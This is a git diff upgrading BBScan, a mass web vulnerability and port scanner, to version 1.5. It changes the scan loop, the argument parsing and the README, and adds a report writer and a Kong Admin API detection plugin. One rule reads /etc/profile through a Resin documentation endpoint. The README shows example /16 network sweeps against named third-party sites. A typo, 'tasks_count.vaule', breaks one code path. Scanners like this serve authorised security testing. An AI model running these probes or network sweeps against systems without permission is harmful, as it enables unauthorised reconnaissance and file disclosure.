- global_lock = multiprocessing.Manager().Lock()
- print_msg('BBScan v1.4')
- q_results = multiprocessing.Manager().Queue()
- q_targets = multiprocessing.Manager().Queue()
- target_process_done = multiprocessing.Value('i', 0)
-
- for input_file in input_files:
+ print('* BBScan v1.5 https://github.com/lijiejie/BBScan *')
+ if args.no_scripts:
+ print('* Scripts scan was disabled.')
+ if args.require_ports:
+ print('* Scripts scan port check: %s' % ','.join([str(x) for x in args.require_ports]))
+
+ q_targets = multiprocessing.Manager().Queue() # targets Queue
+ q_results = multiprocessing.Manager().Queue() # results Queue
+ # is process targets done
+ # 目标处理完成,扫描进程才可以开始退出
+ process_targets_done = multiprocessing.Value('i', 0)
+ tasks_count = multiprocessing.Value('i', 0) # 任务计数器
+
+ for input_file in args.input_files:
if args.host:
- lines = args.host
+ target_list = args.host
+ # 命令行传入少量Target,至多创建2倍扫描进程
+ if args.network == 32 and len(target_list) * 2 < args.p:
+ args.p = len(target_list) * 2
elif args.f or args.d:
with open(input_file) as inFile:
- lines = inFile.readlines()
-
+ target_list = inFile.readlines()
+ # 文件读入少量目标,至多创建2倍扫描进程
+ if args.network == 32 and len(target_list) * 2 < args.p:
+ args.p = len(target_list) * 2
try:
- print_msg('Init %s scan process, please wait' % args.p)
- STOP_ME = False
- while q_results.qsize() > 0:
- q_results.get()
- while q_targets.qsize() > 0:
- q_targets.get()
- target_process_done.value = 0
- threading.Thread(target=save_report, args=(q_results, input_file)).start()
+ # 生成报告,管理标准输出
+ threading.Thread(target=save_report, args=(args, q_results, input_file, tasks_count)).start()
+
+ clear_queue(q_results)
+ clear_queue(q_targets)
+ process_targets_done.value = 0
+ start_time = time.time()
if args.crawler:
_input_files = glob.glob(args.crawler + '/*.log')
for _file in _input_files:
- q_targets.put({'file': _file, 'url': ''})
+ q_targets.put({'file': _file})
+ tasks_count.vaule += 1
+ if tasks_count.value < args.p:
+ args.p = tasks_count.value # 仅导入少量网站
+ process_targets_done.value = 1
else:
- queue_hosts = Queue.Queue()
- for line in lines:
- if line.strip():
- # Work with https://github.com/lijiejie/subDomainsBrute
- # Delimiter "," accepted
- hosts = line.replace(',', ' ').strip().split()
- queue_hosts.put(hosts[0])
-
- threading.Thread(target=process_target).start()
+ # 在独立的进程中,安全地使用 gevent
+ tasks_count.value = 0
+ p = multiprocessing.Process(
+ target=prepare_targets,
+ args=(target_list, q_targets, q_results, args, tasks_count, process_targets_done))
+ p.daemon = True
+ p.start()
+ time.sleep(1.0) # 让prepare_targets进程尽快开始执行
all_process = []
for _ in range(args.p):
p = multiprocessing.Process(
- target=scan_process, args=(q_targets, q_results, global_lock, args, target_process_done))
+ target=scan_process,
+ args=(q_targets, q_results, args, process_targets_done))
p.daemon = True
p.start()
all_process.append(p)
+ q_results.put('%s scan process created.' % args.p)
+
while True:
for p in all_process[:]:
if not p.is_alive():
all_process.remove(p)
if not all_process:
break
- time.sleep(0.1)
+ time.sleep(0.5)
+
+ cost_time = time.time() - start_time
+ cost_min = int(cost_time / 60)
+ cost_min = '%s min ' % cost_min if cost_min > 0 else ''
+ cost_seconds = '%.1f' % (cost_time % 60)
+ q_results.put('Scanned %s targets in %s%s seconds.' % (tasks_count.value, cost_min, cost_seconds))
except KeyboardInterrupt as e:
- STOP_ME = True
- print_msg('You aborted the scan.')
- exit(1)
+ config.stop_me = True
+ q_results.put('Scan aborted.')
+ exit(-1)
except Exception as e:
- print_msg('[__main__.exception] %s %s' % (type(e), str(e)))
- STOP_ME = True
+ q_results.put('[__main__.exception] %s %s' % (type(e), str(e)))
+ config.stop_me = True
diff --git a/README.md b/README.md
index 74ae332..f362720 100644
--- a/README.md
+++ b/README.md
@@ -1,72 +1,122 @@
-# BBScan 1.4 #
-
-A vulnerability scanner focus on scanning large number of targets in short time with a minimal set of rules.
-
-**BBScan** 用于渗透测试前期,快速地对大量目标进行扫描,发现信息泄露等常见漏洞,找到可能的突破入口。
-
-它的特点是快速,规则配置简单。
-
-## Change Log
-
-* [2019-05-13] BBScan 1.4 with scan strategy optimized.
-
-## Install ##
-
-Install required packages with pip
-
- pip install -r requirements.txt
-
-## Usage ##
-
- usage: BBScan.py [options]
-
- * A tiny Batch weB+ vulnerability Scanner. *
- By LiJieJie (http://www.lijiejie.com)
-
- optional arguments:
- -h, --help show this help message and exit
- --host [HOST [HOST2 HOST3 ...] [HOST [HOST2 HOST3 ...] ...]]
- Scan several hosts from command line
- -f TargetFile Load new line delimited targets from TargetFile
- -d TargetDirectory Load all *.txt files from TargetDirectory
- --crawler CrawlDirectory
- Load all *.log crawl files from CrawlDirectory
- --full Process all sub directories.
- -n, --no-crawl No crawling, sub folders will not be processed.
- -nn, --no-check404 No HTTP 404 existence check
- --scripts-only Scan with user scripts only
- --no-scripts Disable user scripts scan
- -p PROCESS Num of processes running concurrently, 30 by default
- -t THREADS Num of scan threads for each scan process, 3 by default
- --network MASK Scan all Target/MASK hosts,
- should be an int between 24 and 31
- --timeout Timeout Max scan minutes for each website, 10 by default
- -nnn, --no-browser Do not auto open web browser after scan finished
- -md Save scan report as markdown format
+# BBScan 1.5 #
+
+**BBScan** 是一个高并发漏洞扫描工具,可用于
+
+* 高危漏洞爆发后,编写简单插件或规则,进行全网扫描
+* 作为巡检组件,集成到已有漏洞扫描系统中
+
+BBScan能够在1分钟内
+
+* 对超过2万个IP地址进行指定端口发现,同时,进行漏洞验证。例如,Samba MS17010漏洞
+* 对超过1000个网站进行HTTP服务发现(80/443),同时,请求某个指定URL,完成漏洞检测
+
+------
+
+**BBScan** is a super fast vulnerability scanner.
+
+* A class B network (65534 hosts) could be scanned within 4 minutes (ex. Detect Samba MS17010)
+* Up to find more than 1000 target's web services and meanwhile, detect the vulnerability associated with a specified URL within one minute
+
+------
+
+### Install ###
+
+ pip2.7 install -r requirements.txt
+
+### 开始使用
+
+* ##### **使用1个或多个插件,扫描某个B段**
+
+```
+python BBScan.py --scripts-only --script redis_unauthorized_access --host www.site.com --network 16
+```
+
+上述命令将使用 `redis_unauthorized_access` 插件,扫描 www.site.com/16,扫描过程将持续 2~4 分钟。
+
+* ##### 使用1个或多个规则,扫描文件中的所有目标
+
+```
+python BBScan.py --no-scripts --rule git_and_svn --no-check404 --no-crawl -f iqiyi.txt
+```
+
+使用 `git_and_svn` 文件中的规则,扫描 `iqiyi.txt` 文件中的所有目标,每一行一个目标
+
+`--no-check404` 指定不检查404状态码
+
+`--no-crawl` 指定不抓取子目录
+
+通过指定上述两个参数,可显著减少HTTP请求的数量。
+
+### 参数说明 ###
+
+**如何设定扫描目标**
+
+ --host [HOST [HOST ...]]
+ 该参数可指定1个或多个域名/IP
+ -f TargetFile 从文件中导入所有目标,目标以换行符分隔
+ -d TargetDirectory 从文件夹导入所有.txt文件,文件中是换行符分隔的目标
+ --network MASK 设置一个子网掩码(8 ~ 31),配合上面3个参数中任意一个。将扫描
+ Target/MASK 网络下面的所有IP
+
+**HTTP扫描**
+
+ --rule [RuleFileName [RuleFileName ...]]
+ 扫描指定的1个或多个规则
+ -n, --no-crawl 禁用页面抓取,不处理页面中的其他链接
+ -nn, --no-check404 禁用404状态码检查
+ --full 处理所有子目录。 /x/y/z/这样的链接,/x/ /x/y/也将被扫描
+
+**插件扫描**
+
+ --scripts-only 只启用插件扫描,禁用HTTP规则扫描
+ --script [ScriptName [ScriptName ...]]
+ 扫描指定1个或多个插件
+ --no-scripts 禁用插件扫描
+
+**并发**
+
+```
+ -p PROCESS 扫描进程数,默认30。建议设置 10 ~ 50之间
+ -t THREADS 单个目标的扫描线程数, 默认3。建议设置 3 ~ 10之间
+```
+
+**其他参数**
+
+ --timeout TIMEOUT 单个目标最大扫描时间(单位:分钟),默认10分钟
+ -md 输出markdown格式报告
+ --save-ports PortsDataFile
+ 将端口开放信息保存到文件 PortsDataFile,可以导入再次使用
+ --debug 打印调试信息
+ -nnn, --no-browser 不使用默认浏览器打开扫描报告
-v show program's version number and exit
+### 使用技巧
+
+* **如何把BBScan当做一个快速的端口扫描工具使用?**
+
+找到scripts/tools/port_scan.py,填入需要扫描的端口号列表。把文件移动到scripts下。执行
+
+```
+python BBScan.py --scripts-only --script port_scan --host www.baidu.com --network 16 --save-ports ports_80.txt
+```
+
+`--save-ports` 是一个非常有用的参数,可以将每次任务执行过程发现的端口,保存到文件中
-**1. Scan several hosts from command line**
+* **如何观察执行过程**
- python BBScan.py --host www.a.com www.b.com
+请设置 `--debug` 参数,观察是否按照预期,执行插件,发起HTTP请求
-**2. Scan www.target.com and all the other IPs under www.target.com/28**
+* **如何编写插件**
- python BBScan.py --host www.target.com --network 28
-
-**3. Load newline delimited targets from file and scan**
-
- python BBScan.py -f wandoujia.com.txt
+请参考scripts文件夹下的插件内容。self参数是一个Scanner对象,可使用Scanner对象的任意方法、属性。
-**4. Load all targets from Directory(\*.txt file only) and scan**
+`self.host` `self.port` 是目标主机和端口
- python BBScan.py -d targets/
+`self.ports_open` 是开放的端口列表,是所有插件共享的。 一般不在插件执行过程中再单独扫描端口
-**5. Load crawler logs from Directory(\*.log file only) and scan**
+`self.conn_pool` 是HTTP连接池
- python BBScan.py --crawler crawler_logs/
+`self.http_request` 可发起HTTP GET请求
-crawler log files should be formarted first:
+`self.index_headers` `self.index_status` `self.index_html_doc` 是请求首页后返回的,一旦扫描器发现有插件依赖,会预先请求首页,保存下来,被所有插件公用
- . GET http://www.iqiyi.com/ HTTP/1.1^^^200
- . POST http://www.pps.tv/login.php HTTP/1.1^^^user=admin&passwd=admin^^^200
\ No newline at end of file
diff --git a/lib/cmdline.py b/lib/cmdline.py
index bd8e418..bf4f664 100644
--- a/lib/cmdline.py
+++ b/lib/cmdline.py
@@ -1,4 +1,5 @@
#!/usr/bin/env python
+# -*- encoding: utf-8 -*-
#
# Parse command line arguments
#
@@ -7,67 +8,88 @@
import argparse
import sys
import os
+import glob
+import re
def parse_args():
parser = argparse.ArgumentParser(prog='BBScan',
formatter_class=argparse.RawTextHelpFormatter,
- description='* A tiny Batch weB vulnerability Scanner. *\n'
- 'By LiJieJie (http://www.lijiejie.com)',
+ description='* A fast vulnerability Scanner. *\n'
+ 'By LiJieJie & Vivian (http://www.lijiejie.com)',
usage='BBScan.py [options]')
- parser.add_argument('--host', metavar='HOST [HOST2 HOST3 ...]', type=str, default='', nargs='*',
- help='Scan several hosts from command line')
-
- parser.add_argument('-f', metavar='TargetFile', type=str, default='',
- help='Load new line delimited targets from TargetFile')
-
- parser.add_argument('-d', metavar='TargetDirectory', type=str, default='',
- help='Load all *.txt files from TargetDirectory')
-
- parser.add_argument('--crawler', metavar='CrawlDirectory', type=str, default='',
- help='Load all *.log crawl files from CrawlDirectory')
-
- parser.add_argument('--full', dest='full_scan', default=False, action='store_true',
- help='Process all sub directories.')
-
- parser.add_argument('-n', '--no-crawl', dest='no_crawl', default=False, action='store_true',
- help='No crawling, sub folders will not be processed.')
-
- parser.add_argument('-nn', '--no-check404', dest='no_check404', default=False, action='store_true',
- help='No HTTP 404 existence check')
-
- parser.add_argument('--scripts-only', dest='scripts_only', default=False, action='store_true',
- help='Scan with user scripts only')
-
- parser.add_argument('--no-scripts', dest='no_scripts', default=False, action='store_true',
- help='Disable user scripts scan')
-
- parser.add_argument('-p', metavar='PROCESS', type=int, default=30,
- help='Num of processes running concurrently, 30 by default')
-
- parser.add_argument('-t', metavar='THREADS', type=int, default=3,
- help='Num of scan threads for each scan process, 3 by default')
-
- parser.add_argument('--network', metavar='MASK', type=int, default=32,
- help='Scan all Target/MASK hosts, \nshould be an int between 24 and 31')
-
- parser.add_argument('--timeout', metavar='Timeout', type=int, default=10,
- help='Max scan minutes for each website, 10 by default')
-
- parser.add_argument('-nnn', '--no-browser', dest='no_browser', default=False, action='store_true',
- help='Do not auto open web browser after scan finished')
-
- parser.add_argument('-md', default=False, action='store_true',
- help='Save scan report as markdown format')
-
- parser.add_argument('-v', action='version', version='%(prog)s 1.4 By LiJieJie')
+ group_target = parser.add_argument_group('Targets', '')
+ group_target.add_argument('--host', metavar='HOST', type=str, default='', nargs='*',
+ help='Scan several hosts from command line')
+ group_target.add_argument('-f', metavar='TargetFile', type=str, default='',
+ help='Load new line delimited targets from TargetFile')
+ group_target.add_argument('-d', metavar='TargetDirectory', type=str, default='',
+ help='Load all *.txt files from TargetDirectory')
+ group_target.add_argument('--crawler', metavar='CrawlDirectory', type=str, default='',
+ help='Load all *.log crawl files from CrawlDirectory')
+ group_target.add_argument('--network', metavar='MASK', type=int, default=32,
+ help='Scan all Target/MASK neighbour hosts, \nshould be an int between 8 and 31')
+
+ group_http = parser.add_argument_group('HTTP SCAN', '')
+ group_http.add_argument('--rule', metavar='RuleFileName', type=str, default='', nargs='*',
+ help='Import specified rule files only.')
+ group_http.add_argument('-n', '--no-crawl', dest='no_crawl', default=False, action='store_true',
+ help='No crawling, sub folders will not be processed')
+ group_http.add_argument('-nn', '--no-check404', dest='no_check404', default=False, action='store_true',
+ help='No HTTP 404 existence check')
+ group_http.add_argument('--full', dest='full_scan', default=False, action='store_true',
+ help='Process all sub directories')
+
+ group_scripts = parser.add_argument_group('Scripts', '')
+ group_scripts.add_argument('--scripts-only', dest='scripts_only', default=False, action='store_true',
+ help='Scan with user scripts only')
+ group_scripts.add_argument('--script', metavar='ScriptName', type=str, default='', nargs='*',
+ help='Execute specified scripts only')
+ # 全局开关
+ group_scripts.add_argument('--no-scripts', dest='no_scripts', default=False, action='store_true',
+ help='Disable all scripts')
+
+ group_concurrent = parser.add_argument_group('CONCURRENT', '')
+ group_concurrent.add_argument('-p', metavar='PROCESS', type=int, default=30,
+ help='Num of processes running concurrently, 30 by default')
+ group_concurrent.add_argument('-t', metavar='THREADS', type=int, default=3,
+ help='Num of scan threads for each scan process, 3 by default')
+
+ group_other = parser.add_argument_group('OTHER', '')
+
+ group_other.add_argument('--timeout', metavar='TIMEOUT', type=int, default=10,
+ help='Max scan minutes for each target, 10 by default')
+
+ group_other.add_argument('-md', default=False, action='store_true',
+ help='Save scan report as markdown format')
+
+ group_other.add_argument('--save-ports', metavar='PortsDataFile', dest='save_ports', type=str, default='',
+ help='Save open ports to PortsDataFile')
+
+ group_other.add_argument('--debug', default=False, action='store_true',
+ help='Show verbose debug info')
+
+ group_other.add_argument('-nnn', '--no-browser', dest='no_browser', default=False, action='store_true',
+ help='Do not open web browser to view report')
+
+ group_other.add_argument('-v', action='version',
+ version='%(prog)s 1.5 (https://github.com/lijiejie/BBScan)')
if len(sys.argv) == 1:
sys.argv.append('-h')
args = parser.parse_args()
check_args(args)
+ if args.f:
+ args.input_files = [args.f]
+ elif args.d:
+ args.input_files = glob.glob(args.d + '/*.txt')
+ elif args.crawler:
+ args.input_files = ['crawler']
+ elif args.host:
+ args.input_files = ['hosts']
+
return args
@@ -78,18 +100,75 @@ def check_args(args):
' -d TargetDirectory \n' \
' --crawler TargetDirectory \n' \
' --host www.host1.com www.host2.com 8.8.8.8'
- print msg
+ print(msg)
exit(-1)
if args.f and not os.path.isfile(args.f):
- print '[ERROR] TargetFile not found: %s' % args.f
+ print('[ERROR] TargetFile not found: %s' % args.f)
exit(-1)
if args.d and not os.path.isdir(args.d):
- print '[ERROR] TargetDirectory not found: %s' % args.f
+ print('[ERROR] TargetDirectory not found: %s' % args.f)
exit(-1)
args.network = int(args.network)
- if not (24 <= args.network <= 32):
- print '[ERROR] Network should be an integer between 24 and 31'
+ if not (8 <= args.network <= 32):
+ print('[ERROR] Network should be an integer between 24 and 31')
exit(-1)
+
+ args.rule_files = []
+ if args.rule:
+ for rule_name in args.rule:
+ if not rule_name.endswith('.txt'):
+ rule_name += '.txt'
+ if not os.path.exists('rules/%s' % rule_name):
+ print('[ERROR] Rule file not found: %s' % rule_name)
+ exit(-1)
+ args.rule_files.append('rules/%s' % rule_name)
+
+ args.require_no_http = True # 所有插件都不依赖 HTTP 连接池
+ args.require_index_doc = False # 插件需要请求首页
+ args.require_ports = set() # 插件扫描所需端口
+ pattern = re.compile(r'ports_to_check.*?\=(.*)')
+
+ if not args.no_scripts:
+
+ if args.script:
+ for script_name in args.script:
+ if not script_name.lower().endswith('.py'):
+ script_name += '.py'
+ if not os.path.exists('scripts/%s' % script_name):
+ print('* Script file not exists: %s' % script_name)
+ exit(-1)
+
+ for _script in glob.glob('scripts/*.py'):
+ script_name_origin = os.path.basename(_script)
+ script_name = script_name_origin.replace('.py', '')
+ if args.script and script_name not in args.script and script_name_origin not in args.script:
+ continue
+ if script_name.startswith('_'):
+ continue
+ with open(_script) as f:
+ content = f.read()
+ if content.find('self.http_request') > 0 or content.find('self.conn_pool.urlopen') > 0:
+ args.require_no_http = False # 插件依赖HTTP连接池
+ if content.find('self.index_') > 0:
+ args.require_no_http = False
+ args.require_index_doc = True
+
+ m = pattern.search(content)
+ if m:
+ m_str = m.group(1).strip()
+ if m_str.find('#') > 0: # 去掉注释
+ m_str = m_str[:m_str.find('#')]
+ if m_str.find('[') < 0:
+ if int(m_str) not in args.require_ports:
+ args.require_ports.add(int(m_str))
+ else:
+ for port in eval(m_str):
+ if port not in args.require_ports:
+ args.require_ports.add(int(port))
+
+ # 端口信息输出到临时文件
+ if args.save_ports:
+ args.ports_file = None
diff --git a/lib/common.py b/lib/common.py
index b8dbb19..f5fcc74 100644
--- a/lib/common.py
+++ b/lib/common.py
@@ -1,16 +1,28 @@
#!/usr/bin/env python
+# -*- encoding: utf-8 -*-
#
# Common functions
#
import urlparse
import re
+import struct
+import platform
+from gevent import socket
+
+
+def clear_queue(this_queue):
+ try:
+ while True:
+ this_queue.get_nowait()
+ except Exception as e:
+ return
def parse_url(url):
_ = urlparse.urlparse(url, 'http')
if not _.netloc:
- _ = urlparse.urlparse('http://' + url, 'http')
+ _ = urlparse.urlparse('https://' + url, 'http')
return _.scheme, _.netloc, _.path if _.path else '/'
@@ -20,7 +32,7 @@ def decode_response_text(txt, charset=None):
return txt.decode(charset)
except Exception as e:
pass
- for _ in ['UTF-8', 'GB2312', 'GBK', 'iso-8859-1', 'big5']:
+ for _ in ['UTF-8', 'GBK', 'GB2312', 'iso-8859-1', 'big5']:
try:
return txt.decode(_)
except Exception as e:
@@ -70,7 +82,7 @@ def cal_depth(self, url):
return url, depth
-def save_user_script_result(self, status, url, title, vul_type=''):
+def save_script_result(self, status, url, title, vul_type=''):
self.lock.acquire()
# print '[+] [%s] %s' % (status, url)
if url not in self.results:
@@ -91,3 +103,41 @@ def escape(html):
return html.replace('&', '&').\
replace('<', '<').replace('>', '>').\
replace('"', '"').replace("'", ''')
+
+
+def is_port_open(host, port):
+ try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.settimeout(3.0)
+ if s.connect_ex((host, int(port))) == 0:
+ return True
+ else:
+ return False
+ except Exception as e:
+ return False
+ finally:
+ try:
+ s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
+ s.close()
+ except Exception as e:
+ pass
+
+
+def scan_given_ports(confirmed_open, confirmed_closed, host, ports):
+ checked_ports = confirmed_open.union(confirmed_closed)
+ ports_open = set()
+ ports_closed = set()
+
+ for port in ports:
+ if port in checked_ports: # 不重复检测已确认端口
+ continue
+ if is_port_open(host, port):
+ ports_open.add(port)
+ else:
+ ports_closed.add(port)
+
+ return ports_open.union(confirmed_open), ports_closed.union(confirmed_closed)
+
+
+if __name__ == '__main__':
+ print(is_port_open('119.84.78.81', 80))
diff --git a/lib/config.py b/lib/config.py
new file mode 100644
index 0000000..41e4759
--- /dev/null
+++ b/lib/config.py
@@ -0,0 +1,9 @@
+# Global Variables share among modules
+
+stop_me = False
+
+user_agent = 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36'
+
+default_headers = {'User-Agent': user_agent, 'Connection': 'Keep-Alive', 'Range': 'bytes=0-102400'}
+
+ports_saved_to_file = False
\ No newline at end of file
diff --git a/lib/consle_width.py b/lib/consle_width.py
new file mode 100644
index 0000000..10b53c9
--- /dev/null
+++ b/lib/consle_width.py
@@ -0,0 +1,94 @@
+""" getTerminalSize()
+ - get width and height of console
+ - works on linux,os x,windows,cygwin(windows)
+"""
+
+__all__ = ['getTerminalSize']
+
+
+def getTerminalSize():
+ import platform
+ current_os = platform.system()
+ tuple_xy = None
+ if current_os == 'Windows':
+ tuple_xy = _getTerminalSize_windows()
+ if tuple_xy is None:
+ tuple_xy = _getTerminalSize_tput()
+ # needed for window's python in cygwin's xterm!
+ if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):
+ tuple_xy = _getTerminalSize_linux()
+ if tuple_xy is None:
+ tuple_xy = (80, 25) # default value
+ return tuple_xy
+
+
+def _getTerminalSize_windows():
+ res = None
+ try:
+ from ctypes import windll, create_string_buffer
+
+ # stdin handle is -10
+ # stdout handle is -11
+ # stderr handle is -12
+
+ h = windll.kernel32.GetStdHandle(-12)
+ csbi = create_string_buffer(22)
+ res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
+ except:
+ return None
+ if res:
+ import struct
+ (bufx, bufy, curx, cury, wattr,
+ left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
+ sizex = right - left + 1
+ sizey = bottom - top + 1
+ return sizex, sizey
+ else:
+ return None
+
+
+def _getTerminalSize_tput():
+ # get terminal width
+ # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
+ try:
+ import subprocess
+ proc = subprocess.Popen(["tput", "cols"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
+ output = proc.communicate(input=None)
+ cols = int(output[0])
+ proc = subprocess.Popen(["tput", "lines"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
+ output = proc.communicate(input=None)
+ rows = int(output[0])
+ return (cols, rows)
+ except:
+ return None
+
+
+def _getTerminalSize_linux():
+ def ioctl_GWINSZ(fd):
+ try:
+ import fcntl, termios, struct, os
+ cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
+ except:
+ return None
+ return cr
+
+ cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
+ if not cr:
+ try:
+ fd = os.open(os.ctermid(), os.O_RDONLY)
+ cr = ioctl_GWINSZ(fd)
+ os.close(fd)
+ except:
+ pass
+ if not cr:
+ try:
+ env = os.environ
+ cr = (env['LINES'], env['COLUMNS'])
+ except:
+ return None
+ return int(cr[1]), int(cr[0])
+
+
+if __name__ == "__main__":
+ sizex, sizey = getTerminalSize()
+ print 'width =', sizex, 'height =', sizey
diff --git a/lib/report.py b/lib/report.py
index a544878..f4424ea 100644
--- a/lib/report.py
+++ b/lib/report.py
@@ -1,12 +1,22 @@
# -*- encoding: utf-8 -*-
# report template
+import time
+from string import Template
+import webbrowser
+import sys
+import codecs
+import os
+from lib.common import escape
+from lib.consle_width import getTerminalSize
+from lib import config
+
# template for html
html_general = """
-BBScan Scan Report
+BBScan 1.5 Scan Report
-Scan finished in ${cost_min} ${cost_seconds} seconds. BBScan v 1.4
+Scanned ${tasks_processed_count} targets in
+${cost_min} ${cost_seconds} seconds.
+${vulnerable_hosts_count} vulnerable hosts found in total.
${content}
@@ -50,7 +62,9 @@
# template for markdown
markdown_general = """
# BBScan Scan Report
-Version:v 1.4
+Version: v 1.5
+Num of targets: ${tasks_processed_count}
+Num of vulnerable hosts: ${vulnerable_hosts_count}
Time cost: ${cost_min} ${cost_seconds} seconds
${content}
"""
@@ -76,3 +90,104 @@
'html': html,
'markdown': markdown
}
+
+
+def save_report(args, _q_results, _file, tasks_processed_count):
+
+ is_markdown = args.md
+ no_browser = args.no_browser
+ start_time = time.time()
+ a_template = template['markdown'] if is_markdown else template['html']
+ t_general = Template(a_template['general'])
+ t_host = Template(a_template['host'])
+ t_list_item = Template(a_template['list_item'])
+ output_file_suffix = a_template['suffix']
+ report_name = '%s_%s%s' % (os.path.basename(_file).lower().replace('.txt', ''),
+ time.strftime('%Y%m%d_%H%M%S', time.localtime()),
+ output_file_suffix)
+
+ html_doc = content = ""
+ vulnerable_hosts_count = 0
+ console_width = getTerminalSize()[0] - 2
+
+ try:
+ while not config.stop_me or _q_results.qsize() > 0:
+ if _q_results.qsize() == 0:
+ time.sleep(0.1)
+ continue
+
+ while _q_results.qsize() > 0:
+ item = _q_results.get()
+ if type(item) is str:
+ message = '[%s] %s' % (time.strftime('%H:%M:%S', time.localtime()), item)
+ if not args.debug and args.network <= 22 and \
+ (item.startswith('Scan ') or item.startswith('No ports open')):
+ sys.stdout.write(message + (console_width - len(message)) * ' ' + '\r')
+ else:
+ print(message)
+ continue
+ host, results = item
+ vulnerable_hosts_count += 1
+
+ # print
+ for key in results.keys():
+ for url in results[key]:
+ print(' [+]%s %s' % (' [%s]' % url['status'] if url['status'] else '', url['url']))
+
+ _str = ""
+ for key in results.keys():
+ for _ in results[key]:
+ _str += t_list_item.substitute(
+ {'status': ' [%s]' % _['status'] if _['status'] else '',
+ 'url': _['url'],
+ 'title': '[%s]' % _['title'] if _['title'] else '',
+ 'vul_type': escape(_['vul_type'].replace('_', ' ')) if 'vul_type' in _ else ''}
+ )
+ _str = t_host.substitute({'host': host, 'list': _str})
+ content += _str
+
+ cost_time = time.time() - start_time
+ cost_min = int(cost_time / 60)
+ cost_min = '%s min' % cost_min if cost_min > 0 else ''
+ cost_seconds = '%.2f' % (cost_time % 60)
+
+ html_doc = t_general.substitute(
+ {'tasks_processed_count': tasks_processed_count.value,
+ 'vulnerable_hosts_count': vulnerable_hosts_count,
+ 'cost_min': cost_min, 'cost_seconds': cost_seconds, 'content': content}
+ )
+
+ with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
+ outFile.write(html_doc)
+
+ if config.ports_saved_to_file:
+ print('* Ports data saved to %s' % args.save_ports)
+
+ if html_doc:
+
+ cost_time = time.time() - start_time
+ cost_min = int(cost_time / 60)
+ cost_min = '%s min' % cost_min if cost_min > 0 else ''
+ cost_seconds = '%.1f' % (cost_time % 60)
+
+ html_doc = t_general.substitute(
+ {'tasks_processed_count': tasks_processed_count.value,
+ 'vulnerable_hosts_count': vulnerable_hosts_count,
+ 'cost_min': cost_min, 'cost_seconds': cost_seconds, 'content': content}
+ )
+
+ with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
+ outFile.write(html_doc)
+
+ print('\n* %s vulnerable targets on sites in total.' % vulnerable_hosts_count)
+ print('* Scan report saved to report/%s' % report_name)
+ if not no_browser:
+ webbrowser.open_new_tab(os.path.abspath('report/%s' % report_name))
+ else:
+ print('\n* No vulnerabilities found on sites in %s.' % _file)
+
+ except Exception as e:
+ print('[save_report_thread Exception] %s %s' % (type(e), str(e)))
+ import traceback
+ traceback.print_exc()
+ sys.exit(-1)
diff --git a/requirements.txt b/requirements.txt
index ffc96a8..ead9f67 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -2,3 +2,6 @@ BeautifulSoup4>=4.3.2
py2-ipaddress>=3.4.1
pymongo
requests
+urllib3
+gevent
+grequests
\ No newline at end of file
diff --git a/rules/phpinfo_or_apc.txt b/rules/phpinfo_or_apc.txt
index 1bcf793..79dfd3d 100644
--- a/rules/phpinfo_or_apc.txt
+++ b/rules/phpinfo_or_apc.txt
@@ -5,7 +5,3 @@
/i.php {tag="allow_url_fopen"} {status=200} {type="html"}
/php.php {tag="allow_url_fopen"} {status=200} {type="html"}
/apc.php {status=200} {tag="APC INFO"} {root_only}
-
-
-
-
diff --git a/rules/phpmyadmin.txt b/rules/phpmyadmin.txt
index 6915aea..dfa2ebe 100644
--- a/rules/phpmyadmin.txt
+++ b/rules/phpmyadmin.txt
@@ -2,4 +2,4 @@
/phpmyadmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
/phpMyAdmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
/_phpmyadmin/index.php {tag="phpMyAdmin"} {status=200} {root_only}
-/pma/index.php {tag="phpMyAdmin"} {status=200} {root_only}
\ No newline at end of file
+/pma/index.php {tag="phpMyAdmin"} {status=200} {root_only}
diff --git a/rules/resin_admin.txt b/rules/resin_admin.txt
index fda3ce8..44ca6d0 100644
--- a/rules/resin_admin.txt
+++ b/rules/resin_admin.txt
@@ -1,4 +1,4 @@
# Resin Doc
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile {tag="/etc/profile.d/*.sh"} {root_only}
# /resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp {tag="This is the default start page for the Resin server"} {root_only}
-/resin-admin/ {status=200} {tag="Resin Admin Login for"} {root_only}
\ No newline at end of file
+/resin-admin/ {status=200} {tag="Resin Admin Login for"} {root_only}
diff --git a/scripts/disabled/kong_admin_rest_api.py b/scripts/disabled/kong_admin_rest_api.py
new file mode 100644
index 0000000..4569185
--- /dev/null
+++ b/scripts/disabled/kong_admin_rest_api.py
@@ -0,0 +1,29 @@
+# -*- encoding: utf-8 -*-
+
+from lib.common import save_script_result
+import requests
+
+
+ports_to_check = 8001 # 默认服务端口
+
+
+def do_check(self, url):
+ if url != '/':
+ return
+
+ if self.conn_pool and self.index_headers.get('Server', '').startswith('kong/'):
+ save_script_result(self, '200', self.base_url, 'Kong Admin Rest API')
+
+ if self.port == 8001: # 如果已经维护了 8001 端口的 HTTP连接池,上面的逻辑已经完成扫描
+ return
+
+ if 8001 not in self.ports_open: # 如果8001端口不开放
+ return
+
+ # 如果输入的是一个非标准端口的HTTP服务
+ # 那么,需要单独对8001端口进行检测
+
+ resp = requests.get('http://%s:8001/' % self.host)
+ headers = resp.headers
+ if headers.get('Server', '').startswith('kong/'):
+ save_script_result(self, resp.status_code, 'http://%s:8001' % self.host, 'Kong Admin Rest API')
